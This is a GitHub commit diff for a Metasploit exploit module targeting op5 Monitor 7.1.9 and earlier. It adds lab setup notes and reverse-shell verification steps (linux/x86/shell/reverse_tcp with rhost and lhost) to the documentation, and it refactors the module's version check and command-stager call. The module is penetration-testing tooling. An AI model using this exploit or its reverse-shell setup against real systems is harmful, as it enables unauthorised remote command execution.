Skip to content

Commit cfb034f

Browse files
author
h00die
committed
fixes all previously identified issues
1 parent 81fa068 commit cfb034f

File tree

2 files changed

+13
-9
lines changed

2 files changed

+13
-9
lines changed

documentation/modules/exploit/linux/http/op5_config_exec.md

Lines changed: 9 additions & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -3,11 +3,19 @@
33
Official Source: [op5.com](https://www.op5.com/blog/wpfb-file/op5-monitor-7-1-9-20160303-tar-gz/)
44
Archived Copy: [github](https://github.com/h00die/MSF-Testing-Scripts)
55

6+
### Creating A Testing Environment
7+
8+
Just a few quick notes on setting up a vulnerable lab with this software.
9+
10+
1. The vulnerable version only installs on CentOS 6.x (author used 6.0 final)
11+
2. Within `php.ini`, `date.timezone = "America/New York"` to `date.timezone = "America/New_York"` if you get php errors
12+
3. You may need to register for a free license via an email challenge/verification
13+
614
## Verification Steps
715

816
1. Install the software, RHEL/CENTOS required (tested on CentOS 6)
917
2. Start msfconsole
10-
3. Do: ```use exploit/linux/http/op5_config_exec ```
18+
3. Do: ```use exploit/linux/http/op5_config_exec```
1119
4. Do: ```set payload linux/x86/shell/reverse_tcp```
1220
5. Do: ```set rhost 192.168.2.31```
1321
6. Do: ```set lhost 192.168.2.229```

modules/exploits/linux/http/op5_config_exec.rb

Lines changed: 4 additions & 8 deletions
Original file line numberDiff line numberDiff line change
@@ -61,13 +61,10 @@ def check
6161
'method' => 'GET'
6262
)
6363
fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to web service - no response") if res.nil?
64-
/Version: (?<version_high>[\d]{1,2})\.(?<version_med>[\d]{1,2})\.(?<version_low>[\d]{1,2})[\s]+\|/ =~ res.body
64+
/Version: (?<version>[\d]{1,2}\.[\d]{1,2}\.[\d]{1,2})[\s]+\|/ =~ res.body
6565

66-
if version_high && version_med && version_low && \
67-
version_high.to_i <= 7 && \
68-
version_med.to_i <= 1 && \
69-
version_low.to_i <= 9
70-
vprint_good("Version Detected: #{[version_high, version_med, version_low].join('.')}")
66+
if version && Gem::Version.new(version) <= Gem::Version.new('7.1.9')
67+
vprint_good("Version Detected: #{version}")
7168
Exploit::CheckCode::Appears
7269
else
7370
Exploit::CheckCode::Safe
@@ -79,8 +76,7 @@ def check
7976

8077
def exploit
8178
execute_cmdstager(
82-
:flavor => :echo,
83-
:nodelete => true
79+
:flavor => :echo
8480
)
8581
end
8682

0 commit comments

Comments
 (0)